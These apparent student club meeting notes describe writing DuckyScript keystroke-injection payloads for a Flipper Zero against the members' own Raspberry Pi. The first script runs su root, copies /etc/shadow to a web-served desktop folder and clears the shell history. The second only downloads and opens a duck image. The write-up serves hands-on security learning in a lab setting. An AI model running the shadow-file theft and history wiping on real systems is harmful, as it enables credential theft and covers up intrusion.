Red Team's Week 5, following the previous meeting's demo of a Rubber Ducky in action saw the work-through of developing and writing a DuckyScript to be run on a Raspbian machine executed via the Bad USB functionality of a Flipper Zero.
¶ The Script
¶ Goal of the Script
The decided upon goal of this script was to steal user credentials by the exfiltration of the shadow file.
¶ The Target System
The target system was a Raspberry Pi running an old version of the Raspian OS owned by Patrick Hirsch. For the purpose of this exercise, we worked under the premise that the root user's password was somehow known to be 1 and that there was a web server running out of a directory on the system, ~hirschp2/Desktop.
Given this, the attack was determined to be success when the shadow file was copied to the desktop.
¶ The Process
With direct physical access to the target system, we figured the commands to be run to achieve the desired outcome and subsequently the series of keystrokes to issue them.
With the steps the script must take figured out, we consulted the Hak5 DuckyScript Documentation to write a script to preform these actions, loaded it onto the Flipper, and tested it. The biggest hurtle that was faced was, seemingly due to an error with the Flipper, CTRL ALT t did not work and had to be substituted for CTRL-ALT t to open the terminal window, in addition to a few issues of timing resolved by adding DELAY commands where needed.
¶ The Final Script:
The final script seen below was successful in copying the device's shadow file to the user hirschp2's desktop supplied with the root user's password.
REM TITLE Copy 'shadow' file to Desktop
REM AUTHOR Patrick, Sujal
REM DESCRIPTION Hello World!
REM always include DELAY in beginning of script so it takes time to open up the terminal and between username and password prompt
DELAY 3000
CTRL-ALT t
DELAY 2000
STRING su root
ENTER
DELAY 2000
STRING 1
ENTER
STRING cp /etc/shadow ~hirschp2/Desktop
ENTER
STRING history -c
ENTER
STRING exit
ENTER
STRING exit
ENTER
¶ The Script in Action
¶ 2024-03-21 R&D Meeting
The following day's meeting of the R&D Division reused the meeting concept, writing their own DuckyScript to download and open an image file.
¶ Intro
Introducing the idea of writing a DuckyScript was well received so the concept of a Rubber Ducky was briefly explained and the Nyan Cat script showed as an example and the outcome of its previous demonstration on a campus machine told.
The group was then asked for an idea of what to write a script to do.
¶ The Script
¶ Goal of the Script
The decided upon goal of this script was to display an image of a rubber duck.
¶ The Target System
The target system was the same Raspberry Pi running an old version of the Raspian OS owned by Patrick Hirsch. For the purpose of this exercise, the same assumptions as before still applied but were not utilized. For this exercise, the Pi was also connected to the internet so it could download an image file.
¶ The Process
With direct physical access to the target system, members figured the commands to be run to achieve the desired outcome and subsequently the series of keystrokes to issue them. Due to a slight difficulty in finding a file format compatible with the default Image Viewer application, an image was hosted on a student Sappho webserver.
With the steps the script must take figured out, consulting the Hak5 DuckyScript Documentation we wrote a script to preform these actions and loaded it onto the Flipper. The first run failed due to an issue of timing but was resolved quickly by the inclusion of a DELAY commands.
¶ The Final Script:
The final script seen below was successful in downloading and opening the specified image file.
REM TITLE Download and Open Image File
REM AUTHOR Sydney B, Kate Groemling
REM DESCRIPTION Hello World!
CTRL-ALT t
DELAY 1000
STRING wget https://nku.edu/~HirschP2/duck.PNG
ENTER
STRING xdg-open duck.PNG
ENTER
¶ The Script in Action
